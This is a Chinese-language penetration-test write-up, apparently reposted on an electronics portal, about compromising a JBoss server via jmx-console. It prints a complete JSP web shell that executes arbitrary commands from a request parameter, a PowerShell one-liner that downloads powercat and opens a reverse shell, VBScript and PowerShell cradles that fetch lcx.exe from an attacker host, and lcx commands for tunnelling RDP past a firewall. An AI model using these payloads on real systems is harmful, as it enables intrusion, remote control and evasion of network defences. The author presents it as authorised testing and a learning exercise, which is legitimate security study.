一.前言
最近做滲透測試中遇到一個jboss的站,在其中學(xué)到一些在乙方工作挺有用的技巧(這次測試是進(jìn)過授權(quán)測試)在次分享一下
二.信息收集
先通過namp進(jìn)行掃描,同時進(jìn)行目錄掃描,發(fā)現(xiàn)8080/jmx-console/,發(fā)現(xiàn)是jboss的站,百度到j(luò)boss可以部署war包getshell,訪問http://xxxx:8080//jmx-console/
三.漏洞利用
全局搜索jboss.system,點(diǎn)擊進(jìn)入

站上
//gg.jsp <%@ page contentType="text/html;charset=big5" session="false" import="java.io.*" %> <html> <head> <title>title> <meta http-equiv="Content-Type" content="text/html; charset=big5"> head> <body> <% Runtime runtime = Runtime.getRuntime(); Process process =null; String line=null; InputStream is =null; InputStreamReader isr=null; BufferedReader br =null; String ip=request.getParameter("cmd"); try { process =runtime.exec(ip); is = process.getInputStream(); isr=new InputStreamReader(is); br =new BufferedReader(isr); out.println("
"); while( (line = br.readLine()) != null ) { out.println(line); out.flush(); } out.println(""); is.close(); isr.close(); br.close(); } catch(IOException e ) { out.println(e); runtime.exit(1); } %> body> html> 我這里就用python 簡單創(chuàng)建個ftp服務(wù)(這也是python的一個巧用)
python -m SimpleHTTPServer 8589





四.進(jìn)一步滲透
1.在獲得php shell的基礎(chǔ)上,我們需要一個真正的cmd shell,這樣有利于操作,進(jìn)過nmap掃描,發(fā)現(xiàn)是windows,我們可以通過powershell進(jìn)行shell反彈powershell IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1');powercat -c ip -p port -e cmd








echo Set Post = CreateObject("Msxml2.XMLHTTP") >>download.vbs echo Set Shell = CreateObject("Wscript.Shell") >>download.vbs echo Post.Open "GET","http://ip/lcxx/lcx.exe",0 >>download.vbs echo Post.Send() >>download.vbs echo Set aGet = CreateObject("ADODB.Stream") >>download.vbs echo aGet.Mode = 3 >>download.vbs echo aGet.Type = 1 >>download.vbs echo aGet.Open() >>download.vbs echo aGet.Write(Post.responseBody) >>download.vbs echo aGet.SaveToFile "C:WindowsTemp2.txt",2 >>download.vbspowershell 下載代碼powershell (new-object System.Net.WebClient).DownloadFile( 'http://ip:7667/lcxx/lcx.exe','C:WindowsTemp2.txt')7.當(dāng)自己寫進(jìn)去了后,更名為exe執(zhí)行的時候,被殺了,最后又看了下任務(wù),才發(fā)現(xiàn)卡巴斯基,然后就一直被卡在這里8.lcx命令如下lcx 命令//被攻擊機(jī)器 lcx -slave 自己外網(wǎng)ip 51 內(nèi)網(wǎng)ip 3389 //攻擊機(jī)器 lcx.exe -listen 51 9090由于防火墻限制,部分端口如3389無法通過防火墻,此時可以將該目標(biāo)主機(jī)的3389端口透傳到防火墻允許的其他端口,如53端口.lcx -tran 53 目標(biāo)主機(jī)ip 3389總結(jié)
雖然暫時沒有成功,但從中還是學(xué)到許多滲透知識,也明白了實(shí)戰(zhàn)能提高許多技術(shù)。不足就是知識不夠,還需努力。
審核編輯 :李倩
聲明:本文內(nèi)容及配圖由入駐作者撰寫或者入駐合作網(wǎng)站授權(quán)轉(zhuǎn)載。文章觀點(diǎn)僅代表作者本人,不代表電子發(fā)燒友網(wǎng)立場。文章及其配圖僅供工程師學(xué)習(xí)之用,如有內(nèi)容侵權(quán)或者其他違規(guī)問題,請聯(lián)系本站處理。
舉報投訴
-
漏洞
+關(guān)注
關(guān)注
0文章
205瀏覽量
15958 -
滲透
+關(guān)注
關(guān)注
0文章
22瀏覽量
6525 -
Shell
+關(guān)注
關(guān)注
1文章
375瀏覽量
25383
原文標(biāo)題:實(shí)戰(zhàn)|一次不完美的Jboss滲透
文章出處:【微信號:菜鳥學(xué)信安,微信公眾號:菜鳥學(xué)信安】歡迎添加關(guān)注!文章轉(zhuǎn)載請注明出處。
發(fā)布評論請先 登錄
相關(guān)推薦
熱點(diǎn)推薦
不完美的伴侶機(jī)器人?
在與人類交互的過程中,表現(xiàn)出與人類相似的不完美,我們就有信心建立起長期的人機(jī)關(guān)系?!薄 ?b class='flag-5'>一位研究員在接受BBC采訪時說,機(jī)器人的開發(fā)取決于用途,工業(yè)機(jī)器人當(dāng)然需要很完美,我們不希望它們犯錯誤。但是對伴侶機(jī)器人來說,它們的行為很重
發(fā)表于 12-28 14:42
Linux環(huán)境下怎么安裝配置JBoss
系統(tǒng)信息操作系統(tǒng):CentOS 7JDK版本:1.8 JBoss版本:JBoss EAP 6.2
發(fā)表于 07-18 08:12
讓STM32完美的處理字符串
今天因?yàn)橄胱孲TM32完美的處理字符串,所以就想著讓STM32嵌入lua,本來想用f103c8t6,但是一編譯就提示內(nèi)存不足......所以單片機(jī)的型號選擇的\我下載到了RBT6的芯片上測試的先說
發(fā)表于 08-20 08:11
一次呼叫典型流程
一次呼叫典型流程:一次呼叫典型流程B.1 概述本章將分別給出主叫流程和被叫流程的例子,以示一次通話過程中UTRAN的典型流程。B.2 主叫流程主叫流程是指UE呼叫其它用戶
發(fā)表于 11-28 17:57
?26次下載
循環(huán)充放電一次就是少一次壽命嗎?
循環(huán)充放電一次就是少一次壽命嗎?循環(huán)就是使用,我們是在使用電池,關(guān)心的是使用的時間,為了衡量充電電池的到底可以使用多長時間這樣一個性能,就規(guī)定了循環(huán)
發(fā)表于 09-07 02:06
?2642次閱讀
一次電池為什么不能被充電?
一次電池為什么不能被充電? 一次電池不能被充電再生是構(gòu)成一次電池體系的本性所決定的,因?yàn)?b class='flag-5'>一次電池的電極反應(yīng)不可逆,也就是說,放電后的放電產(chǎn)
發(fā)表于 10-28 15:29
?6195次閱讀
循環(huán)充放電一次就是少一次壽命嗎?
循環(huán)充放電一次就是少一次壽命嗎?
循環(huán)就是使用,我們是在使用電池,關(guān)心的是使
發(fā)表于 11-11 13:59
?1042次閱讀
電池循環(huán)充放電一次就是少一次壽命嗎?
電池循環(huán)充放電一次就是少一次壽命嗎?
循環(huán)就是使用,我們是在使用電池,關(guān)心的是使用的時間,為了衡量充電電池
發(fā)表于 09-06 11:05
?4013次閱讀
微軟SurfaceHeadphones無線降噪耳機(jī)體驗(yàn) 一次驚艷但不完美的嘗試
隨著越來越多的手機(jī)選擇砍掉 3.5 毫米耳機(jī)插孔,無線藍(lán)牙耳機(jī)從前幾年的小眾產(chǎn)品迅速變成了很多用戶的剛需。
一次調(diào)頻和二次調(diào)頻的概念 一次調(diào)頻可以實(shí)現(xiàn)無差調(diào)節(jié)?
一次調(diào)頻和二次調(diào)頻的概念 一次調(diào)頻可以實(shí)現(xiàn)無差調(diào)節(jié)? 一、一次調(diào)頻和二次調(diào)頻的概念 1.
一次不完美的Jboss滲透
評論